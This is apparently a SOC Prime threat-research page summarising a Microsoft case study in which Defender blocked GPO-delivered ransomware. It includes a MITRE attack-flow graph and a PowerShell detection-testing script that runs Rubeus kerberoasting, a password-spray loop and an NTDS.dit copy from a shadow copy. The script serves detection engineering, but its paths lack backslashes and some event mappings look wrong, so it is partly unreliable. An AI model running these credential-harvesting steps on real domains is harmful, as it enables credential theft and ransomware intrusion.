SOC Prime Bias: High

27 Mar 2026 16:45
newspaper icon Microsoft Security Blog

Case Study: How Defender’s Predictive Shielding Blocked GPO-Based Ransomware Before Execution

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Case Study: How Defender’s Predictive Shielding Blocked GPO-Based Ransomware Before Execution
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Microsoft Defender interrupted a human-operated ransomware attack aimed at a large educational organization by detecting abuse of Group Policy Objects (GPOs) used to weaken security settings and distribute ransomware through scheduled tasks.

Investigation

The attackers compromised a domain admin account, carried out Active Directory enumeration, brute-forced credentials, collected Kerberos tickets and NTDS data, created rogue local accounts, and deployed malicious GPOs to enforce a tampering policy and trigger ransomware delivery through scheduled tasks.

Mitigation

Defender’s predictive shielding identified the malicious GPO activity, enforced temporary GPO hardening, blocked the scheduled-task ransomware rollout, and prevented encryption across 97% of devices.

Response

Once detected, defenders should immediately enable GPO hardening, contain compromised accounts, block suspicious SMB traffic, and investigate for additional persistence methods, including unauthorized local account creation.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef builtin fill:#cccccc %% Reconnaissance Nodes recon_action["<b>Action</b> – Reconnaissance<br/>Used AD Explorer to enumerate Active Directory and performed password guessing."] class recon_action action recon_brute["<b>Technique</b> – T1110 Brute Force: Password Guessing<br/><b>Description</b> Attempts to guess passwords using trial and error."] class recon_brute technique recon_account["<b>Technique</b> – T1087.002 Account Discovery: Domain Account<br/><b>Description</b> Enumerates domain user accounts."] class recon_account technique recon_gpo["<b>Technique</b> – T1615 Group Policy Discovery<br/><b>Description</b> Retrieves Group Policy settings from domain controllers."] class recon_gpo technique %% Reconnaissance Connections recon_action –>|uses| recon_brute recon_action –>|discovers| recon_account recon_action –>|discovers| recon_gpo %% Credential Access Nodes action_cred["<b>Action</b> – Credential Access<br/>Performed Kerberoasting and dumped NTDS.dit."] class action_cred action tech_kerb["<b>Technique</b> – T1558.003 Kerberoasting<br/><b>Description</b> Requests service tickets and cracks them offline."] class tech_kerb technique tech_ntds["<b>Technique</b> – T1003.003 OS Credential Dumping: NTDS<br/><b>Description</b> Extracts password hashes from the Active Directory database."] class tech_ntds technique %% Credential Access Connections action_cred –>|uses| tech_kerb action_cred –>|uses| tech_ntds %% Persistence Nodes action_persist["<b>Action</b> – Persistence<br/>Created new local accounts on compromised hosts."] class action_persist action tech_create_local["<b>Technique</b> – T1136.001 Create Account: Local Account<br/><b>Description</b> Adds local user accounts for ongoing access."] class tech_create_local technique %% Persistence Connections action_persist –>|uses| tech_create_local %% Lateral Movement Nodes action_lateral["<b>Action</b> – Lateral Movement<br/>Used stolen domain credentials to access remote admin shares via SMB."] class action_lateral action tech_smb["<b>Technique</b> – T1021.002 Remote Services SMB/Windows Admin Shares<br/><b>Description</b> Leverages SMB shares for lateral movement."] class tech_smb technique %% Lateral Movement Connections action_lateral –>|uses| tech_smb %% Defense Evasion Nodes action_evasion["<b>Action</b> – Defense Evasion<br/>Deployed malicious GPO to disable Microsoft Defender."] class action_evasion action tech_gpo_mod["<b>Technique</b> – T1484 Domain or Tenant Policy Modification<br/><b>Description</b> Alters Group Policy Objects to change security settings."] class tech_gpo_mod technique tech_impair["<b>Technique</b> – T1562.001 Impair Defenses Disable or Modify Tools<br/><b>Description</b> Turns off or modifies security tooling."] class tech_impair technique %% Defense Evasion Connections action_evasion –>|modifies| tech_gpo_mod action_evasion –>|disables| tech_impair %% Impact Preparation Nodes action_impact["<b>Action</b> – Impact Preparation<br/>Created scheduled task via GPO to copy and execute files on all domain machines."] class action_impact action tech_scheduled["<b>Technique</b> – T1053 Scheduled Task/Job<br/><b>Description</b> Schedules execution of commands at defined times."] class tech_scheduled technique tech_cmd["<b>Technique</b> – T1059.003 Command and Scripting Interpreter Windows Command Shell<br/><b>Description</b> Executes batch files using cmd.exe."] class tech_cmd technique tech_rundll["<b>Technique</b> – T1218.011 System Binary Proxy Execution Rundll32<br/><b>Description</b> Loads malicious DLLs via rundll32.exe."] class tech_rundll technique %% Impact Preparation Connections action_impact –>|creates| tech_scheduled action_impact –>|executes| tech_cmd action_impact –>|uses| tech_rundll %% Ransomware Deployment Nodes action_ransom["<b>Action</b> – Ransomware Deployment<br/>Payload attempts to encrypt files; Defender blocked GPO propagation on many devices."] class action_ransom action tech_encrypt["<b>Technique</b> – T1486 Data Encrypted for Impact<br/><b>Description</b> Encrypts victim data to demand ransom."] class tech_encrypt technique %% Ransomware Deployment Connections action_ransom –>|uses| tech_encrypt %% Overall Flow Sequence recon_action –>|leads_to| action_cred action_cred –>|leads_to| action_persist action_persist –>|leads_to| action_lateral action_lateral –>|leads_to| action_evasion action_evasion –>|leads_to| action_impact action_impact –>|leads_to| action_ransom "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

Attack Narrative & Commands

  1. Active Directory Enumeration with ADExplorer – An attacker uses the living‑off‑the‑land utility ADExplorer.exe to browse the AD database, generating a process‑creation event that matches Image|endswith: 'ADExplorer.exe'.

  2. Credential Brute‑Force (T1110) – The attacker performs a password‑spray against a domain account, causing repeated failed logons (Event 4625) with the failure reason %%2313 (“The user has attempted to log on from an untrusted domain”).

  3. Kerberoasting (T1558.003) – Using the open‑source tool Rubeus, the attacker requests Kerberos service tickets for computer‑account SPNs (e.g., HOST01$). Each request yields Event 4769 where ServiceName ends with $.

  4. NTDS Dump (T1003.003) – The attacker creates a Volume Shadow Copy of the system drive and extracts NTDS.dit using ntdsutil, causing Event 4662 with ObjectType = "ds" and OperationType = "Replication".

All four actions are executed on the same host within a 5‑minute window to emulate a realistic post‑compromise “harvest” phase.

Regression Test Script

# -------------------------------------------------
# Simulation Script – Triggers all four detection paths
# -------------------------------------------------

# 1. ADExplorer execution (process creation)
$adExplorerPath = "$env:ProgramFilesSysinternalsADExplorer.exe"
if (-Not (Test-Path $adExplorerPath)) {
    Write-Host "ADExplorer not found – download placeholder for test."
    # Simulate by copying any exe to the expected name
    Copy-Item "$env:SystemRootSystem32notepad.exe" $adExplorerPath
}
Start-Process -FilePath $adExplorerPath -ArgumentList "/quiet" -WindowStyle Hidden
Start-Sleep -Seconds 5

# 2. Brute‑force login attempts (4625 with %%2313)
$domain = "CONTOSO"
$user   = "testuser"
$badPwd = "IncorrectPassword123!"
1..3 | ForEach-Object {
    $null = [System.DirectoryServices.AccountManagement.PrincipalContext]::new('Domain', $domain).ValidateCredentials($user, $badPwd)
    Start-Sleep -Milliseconds 500
}

# 3. Kerberoasting via Rubeus (requires Rubeus.exe in PATH)
$rubeusPath = "$env:ProgramFilesRubeusRubeus.exe"
if (-Not (Test-Path $rubeusPath)) {
    Write-Host "Rubeus not found – skipping Kerberoasting step."
} else {
    & $rubeusPath kerberoast /outfile:"C:Tempkerb_tickets.kirbi"
}
Start-Sleep -Seconds 5

# 4. NTDS.dit extraction using VSS (4662 replication)
# Create a VSS shadow copy and copy NTDS.dit
$shadow = (vssadmin list shadows | Select-String -Pattern "ShadowCopy Volume" -Context 0,1).Line.Split()[-1]
$ntdsSource = "$shadowWindowsNTDSNTDS.dit"
$ntdsDest   = "C:TempNTDS_dump.dit"
if (Test-Path $ntdsSource) {
    Copy-Item -Path $ntdsSource -Destination $ntdsDest -Force
}
Start-Sleep -Seconds 5

Write-Host "Simulation complete. All telemetry should be ingested."

Cleanup Commands

# -------------------------------------------------
# Cleanup – removes artifacts created by the simulation
# -------------------------------------------------

# Remove fake ADExplorer if it was created
Remove-Item -Path "$env:ProgramFilesSysinternalsADExplorer.exe" -ErrorAction SilentlyContinue

# Delete Kerberos dump
Remove-Item -Path "C:Tempkerb_tickets.kirbi" -ErrorAction SilentlyContinue

# Delete NTDS dump
Remove-Item -Path "C:TempNTDS_dump.dit" -ErrorAction SilentlyContinue

# Clear any created shadow copies (requires admin)
# vssadmin delete shadows /all /quiet

Write-Host "Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free